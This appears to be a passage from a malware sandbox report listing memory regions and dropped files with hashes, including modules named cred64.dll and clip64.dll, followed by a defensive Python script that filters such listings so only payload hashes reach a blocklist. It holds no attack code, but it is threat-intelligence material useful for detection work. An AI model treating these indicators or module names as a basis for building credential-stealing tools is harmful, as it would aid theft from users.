memory/4240-437-0x0000000000400000-0x0000000000636000-memory.dmp

memory/4240-440-0x0000000000400000-0x0000000000636000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7b820bf35ead1603b44e8104f79531e2
SHA1 bceaf499a182959ca085ecc921c06565b1bf24ef
SHA256 2a9935ebfd17356eabc31282e827cbff1a0a7698bb525c3b57146f3a9d9072a4
SHA512 fa48818410c9769eb9edd0b181725f4f303066464bca5c099241f28940b7e63a1374cf862a31cc48e79f174237640ea5421014d62012813a6d19f79f22c0e46a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 da6c8a1e41148106a00a89a5bb238727
SHA1 6a8ff3294d1f378acd2dd8620ca9b6351e6cc6cb
SHA256 e4ca448ce9f43d705c6089dceae0854b331faf2dd4d0f576d6803016e4ebd529
SHA512 6cae6b09243519a25b7decabc021fb41a0c8808aa45c9241c4d6e02f88038b561de3daa55671f296dd1219c892a447a4bc023183d0a87d12c9e4e00c9496835d

memory/6068-465-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3232-464-0x0000000002E90000-0x0000000002EA6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 b72464531eda9c139d7fee6ceae9adf9
SHA1 6c5675d501cda6b8babb4940912ca733b17ee029
SHA256 e253d634c94a9799873b940cfbda6d8e34ff755b7f1e1d57001928fc6dfa69b8
SHA512 91e76ac3c76e4ef75ec64f4ab1921b9dc92ae3607f64b2835370af7613eee4a8079c2db2cf824110960620a4b490144db739ec4745bd9c5c649fece12dd183f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe590a85.TMP

MD5 9c8ec2f921d5bd42f708ba8182f7a3c6
SHA1 84d0ea6be233041fb712d00ccf616c847f5eb064
SHA256 ae7788f9a0bc9b63d1e5ae795274401ab8f96e262d91b3e9db5955e5c9aeffe3
SHA512 55f97a54090a0366ffec54ceb4ff466db4d5bf15479091f08101a8b0eb2c7190c30452a9d0d9f847dec93e49c473cb7e2cc691b36cb9588d873dff411c6c5703

memory/5832-480-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/1040-488-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5560-494-0x0000000000400000-0x0000000000636000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d1429f96f1ff1204b4308c23639091b2
SHA1 37fb6501dc5730f3f17711e04ead78822656c3ee
SHA256 df60b49ca841421f12e0d6d5e2996264c9081ae1b15753e38afcbb4788b5d79c
SHA512 76714f3fcd06a5cd38f136fe4675add150fde8e457066b89ce5a5b3a37dda425a1a57e462e0f35cf7aaf23e14cf66f213d2fe8298797928bd130643f89732836

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_obigk44l.5fw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1040-574-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1752-597-0x00007FF69DBD0000-0x00007FF69E171000-memory.dmp

memory/5560-598-0x0000000000400000-0x0000000000636000-memory.dmp

memory/1752-625-0x00007FF69DBD0000-0x00007FF69E171000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/1040-678-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5792-680-0x00007FF73E110000-0x00007FF73E476000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 1fc73ad88c9785885e8ad31970410530
SHA1 93b7411fb87350f88ada75a418a9920cc20f8474
SHA256 7d0c0f0aa1f7dfb077bd801d96a0c20c512c7930e55366426d7705e9df428314
SHA512 6406ccb9f6f69df1e074be4159a10bca9161f2e0c942493a08970cd69aa8d7045fe3b4a150ca65ecf94bbd11f39e93582b0724a79ce9e812210b577c93360250

memory/5560-705-0x0000000000400000-0x0000000000636000-memory.dmp

memory/5240-723-0x00007FF672DD0000-0x00007FF673371000-memory.dmp

memory/2264-731-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5792-770-0x00007FF73E110000-0x00007FF73E476000-memory.dmp

memory/5560-771-0x0000000000400000-0x0000000000636000-memory.dmp

memory/4252-789-0x0000000001300000-0x000000000133E000-memory.dmp

memory/5792-790-0x00007FF73E110000-0x00007FF73E476000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8019fc8342dc094aa41282bcd123608a
SHA1 27f281826f59236f197a2b0ddbb2bfdf6935834a
SHA256 fdb0443c2c98899fd17edc7c49d51c32c0c2f9cdff74ddb02a5a4f7a056d970e
SHA512 38a80f5c8133333ba925e12cc8d765c9605558eb33784d14be0179034b1813378026734eccd5a41b898fce77e9244fe899b4c54761986044d3cb0fbf020a6494

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ffa3ab3faa9a9fae197ffe5544385ebc
SHA1 1013c2dfe753e27336dcf4075e5acf9eaef6aa14
SHA256 be743bb55c8da8afb5f33a5548927676a4021ca2204824ec0392900fa4dfa025
SHA512 ece91a770d7b1b6a5c50d37d30f2b6c085ccaf050c03b8f528656df8d26c43ecde367806e9e7b41cb93ea03a6178a7127be5e2b07a5dfbc2a9ae500a0c9379e7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 375f40e3d49f36af58d0b93428cbc6f1
SHA1 62dc9bdc78242ea43d84befafe1e612a43a67d25
SHA256 6bc5df748b6a2838c11ba9f17f5285c13165a1f1260bae7f3c7554d69d0d0e33
SHA512 b440617ce61e379aa6e9ae6ea5638a033f5c38a4c01b52d7350cae1c61dee1d4694b6acc1efc417c322692041bd7fe6334ee8eab9bc6293b53a3974bbe15ea47

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 11eb18e44c2d2329b6a505f98ca56323
SHA1 59159fa1f86b42dbf8a2b034f246d2ddbf102b2a
SHA256 5f21029f3fa416416fc29b26d4b152b51dd042285df8fd3fa06b0ab356b9fa2c
SHA512 3f520dbaf020cb2c712bed311eca5a3da5980ccc4d48eae2f2edcc115a76d33e4e72fb481ead468cce16b44a078a981a11af2dfde55c3b3795e63eefab664c77
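As an added example (not part of the sandbox report or its tooling), the script below ingests entries in the path-plus-hash layout used in the listing above, collapses the verbatim repeats the report contains, and sorts every entry into a bucket so that only the dropped payload hashes are offered for a blocklist. The Edge files under User Data are the sandbox's own browser profile being rewritten during the run, the crashpad pipe hashes to the SHA-256 of zero bytes, __PSScriptPolicyTest_*.ps1 is PowerShell's own script-policy probe, and the DLLs under is-XXXXX.tmp\_isetup\ are stock Inno Setup helpers whose hashes are shared with legitimate installers, so none of those belong on a blocklist even though they appear here next to real payloads. The bucket names, regexes and function names are this example's own choices; the sample input is an abbreviated excerpt of the entries listed above (paths and SHA256 lines only).

```python
import re

# Abbreviated excerpt of the "Files" listing above (paths and SHA256 lines copied
# from the report; it deliberately keeps one of the report's verbatim repeats).
REPORT_EXCERPT = r"""
memory/3740-234-0x00007FFFFF520000-0x00007FFFFFFE1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

C:\Users\Admin\AppData\Local\Temp\latestX.exe
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

\??\pipe\LOCAL\crashpad_3424_DADOIVFERKEBRADR
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
SHA256 a8ef4aeabca78b226da5e9b57a8758e1ae04e3ef01274b8f6d61efa2fece7cd1

C:\Users\Admin\AppData\Local\Temp\is-5I9HH.tmp\_isetup\_isdecmp.dll
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_obigk44l.5fw.ps1
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529

C:\ProgramData\CoreArchive\CoreArchive.exe
SHA256 b9763b0e13159d7ddedcd2ae757e9557a6f1d8081b2646ae4d9bebe845f9c451
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"  # SHA-256 of zero bytes
BROWSER_STATE_RE = re.compile(r"\\(Microsoft\\Edge|Google\\Chrome)\\User Data\\", re.I)
INNO_UNPACK_RE = re.compile(r"\\is-[A-Z0-9]{5}\.tmp\\", re.I)  # Inno Setup's temporary unpack directory
BINARY_EXT = (".exe", ".dll", ".tmp")


def parse_file_listing(text):
    """Turn the path/hash blocks into a list of {"path", "kind", "hashes"} entries."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if m:
            if current is not None:  # a hash line before any path (listing cut mid-entry) is dropped
                current["hashes"][m.group(1)] = m.group(2).lower()
            continue
        kind = "memory" if line.startswith("memory/") else "file"
        current = {"path": line, "kind": kind, "hashes": {}}
        entries.append(current)
    return entries


def classify(entry):
    """Bucket an entry; only 'dropped_binary' is a candidate for a hash blocklist."""
    path = entry["path"]
    if entry["kind"] == "memory":
        return "memory_dump"
    if entry["hashes"].get("SHA256") == EMPTY_SHA256:
        return "empty_content"     # e.g. the crashpad pipe: hash of nothing, useless as an IOC
    if BROWSER_STATE_RE.search(path):
        return "browser_state"     # the sandbox's own Edge profile rewritten during the run
    if "__PSScriptPolicyTest_" in path:
        return "host_noise"        # PowerShell's script-policy probe, written on every start
    if INNO_UNPACK_RE.search(path):
        return "installer_unpack"  # stock Inno Setup helpers; hashes shared with benign installers
    if path.lower().endswith(BINARY_EXT):
        return "dropped_binary"
    return "other"


def dedupe(entries):
    """Collapse verbatim repeats (same path, same SHA256) while keeping report order."""
    seen, unique = set(), []
    for e in entries:
        key = (e["path"], e["hashes"].get("SHA256"))
        if key not in seen:
            seen.add(key)
            unique.append(e)
    return unique


def extract_iocs(text):
    """Map bucket -> sorted unique SHA256 values (memory dumps carry their path instead)."""
    buckets = {}
    for e in dedupe(parse_file_listing(text)):
        buckets.setdefault(classify(e), set()).add(e["hashes"].get("SHA256", e["path"]))
    return {k: sorted(v) for k, v in buckets.items()}


def blockable_hashes(text):
    """The SHA256 values that actually belong on a blocklist."""
    return extract_iocs(text).get("dropped_binary", [])
```

Run against the excerpt, `blockable_hashes` returns only the three payload hashes (latestX.exe, cred64.dll, CoreArchive.exe); the Inno Setup helper, the Edge profile file, the policy probe and the empty pipe land in their own buckets so they can be reviewed but are not pushed to enforcement. On the full listing above the same filter also drops the many Preferences, Local State, TransportSecurity and Network Persistent State variants, which differ in hash only because the browser kept rewriting them.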